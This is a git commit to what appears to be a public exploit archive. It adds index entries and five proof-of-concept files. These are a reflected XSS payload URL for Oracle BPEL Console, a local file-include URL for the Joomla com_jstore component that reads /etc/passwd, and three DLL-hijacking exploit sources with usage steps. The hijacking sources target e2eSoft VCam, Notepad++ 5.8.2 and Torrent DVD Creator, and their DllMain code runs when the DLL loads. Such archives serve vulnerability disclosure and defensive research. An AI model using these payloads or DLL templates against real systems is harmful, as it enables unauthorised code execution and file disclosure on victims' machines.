Updated 10_03_2014

2014-10-03 04:45:15 +00:00 · 2014-10-03 04:45:15 +00:00 · 8e5a9aa87e
commit 8e5a9aa87e
parent 2a66404f6b
6 changed files with 195 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31362,3 +31362,8 @@ id,file,description,date,author,platform,type,port
 34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 'mfc71esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
 34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
 34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component 'PID' Parameter Cross Site Scripting Vulnerability",2010-10-11,FL0RiX,php,webapps,0
 34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 BPEL Console Cross Site Scripting Vulnerability",2010-10-12,"Alexander Polyakov",jsp,webapps,0
 34835,platforms/windows/remote/34835.py,"e2eSoft VCam DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
 34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
--- a/platforms/jsp/webapps/34834.txt
+++ b/platforms/jsp/webapps/34834.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/43954/info
 Oracle Fusion Middleware is prone to a cross-site scripting vulnerability in BPEL Console.
 The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Valid Session' privileges.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 Oracle BPEL Console 10.1.3.3.0 is vulnerable. 
 http://www.example.com:7777/BPELConsole/default/processLog.jsp?processId=*&revisionTag=*&processName=ssssssssssssssssssss"><script>alert()</script>&eventType=all&eventDate=all
--- a/platforms/php/webapps/34837.txt
+++ b/platforms/php/webapps/34837.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/44053/info
 The 'com_jstore' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
 http://www.example.com/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 
--- a/platforms/windows/remote/34835.py
+++ b/platforms/windows/remote/34835.py
@ -0,0 +1,60 @@
 source: http://www.securityfocus.com/bid/44051/info
 e2eSoft VCam is prone to a vulnerability that lets attackers execute arbitrary code.
 An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 
 ===================================================
 e2eSoft VCam DLL Hijacking Exploit (ippopencv100.dll & ippcv-6.1.dll )
 ===================================================
 /*
 #e2eSoft VCam DLL Hijacking Exploit (ippopencv100.dll & ippcv-6.1.dll )
 #Author    :   anT!-Tr0J4n
 #Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends
 #Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
 #Software :   http://www.e2esoft.cn/vcam/
 #Tested on:   Windows? XP sp3
 #Home     :   www.Dev-PoinT.com
 ==========================
 How  TO use : Compile and rename to  ippopencv100.dll & ippcv-6.1.dll , create a file in the same dir with one of the following extensions.
 check the result > Hack3d    
 ==========================
 # ippopencv100.dll & ippcv-6.1.dll(code)
 */
 #include "stdafx.h"
 void init() {
 MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
 }
 BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
 {
    switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
 init();break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 break;
    }
    return TRUE;
 }
--- a/platforms/windows/remote/34836.py
+++ b/platforms/windows/remote/34836.py
@ -0,0 +1,57 @@
 source: http://www.securityfocus.com/bid/44052/info
 Notepad++ is prone to a vulnerability that lets attackers execute arbitrary code.
 An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
 Notepad++ 5.8.2 is vulnerable; other versions may also be affected.
 /*
 #Notepad++ 5.8.2 DLL Hijacking Exploit (libtidy.dll)
 #Author    :   anT!-Tr0J4n
 #Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends
 #Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
 #Software :  http://notepad-plus-plus.org/
 #Tested on:   Windows? XP sp3
 #Home     :   www.Dev-PoinT.com
 ==========================
 How  TO use : Compile and rename to  libtidy.dll , create a file in the same dir with one of the following extensions.
 check the result > Hack3d    
 ==========================
 # libtidy.dll(code)
 */
 #include "stdafx.h"
 void init() {
 MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
 }
 BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
 {
    switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
 init();break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 break;
    }
    return TRUE;
 }
--- a/platforms/windows/remote/34838.c
+++ b/platforms/windows/remote/34838.c
@ -0,0 +1,56 @@
 source: http://www.securityfocus.com/bid/44054/info
 Torrent DVD Creator is prone to a vulnerability that lets attackers execute arbitrary code.
 An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 
 /*
 #Torrent DVD Creator DLL Hijacking Exploit (quserex.dll)
 #Author    :   anT!-Tr0J4n
 #Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends
 #Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
 #Software :   http://www.torrentrockyou.com
 #Tested on:   Windows. XP sp3
 #Home     :   www.Dev-PoinT.com
 ==========================
 How  TO use : Compile and rename to  quserex.dll , create a file in the same dir with one of the following extensions.
 check the result > Hack3d    
 ==========================
 # quserex.dll(code)
 */
 #include "stdafx.h"
 void init() {
 MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
 }
 BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
 {
    switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
 init();break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 break;
    }
    return TRUE;
 }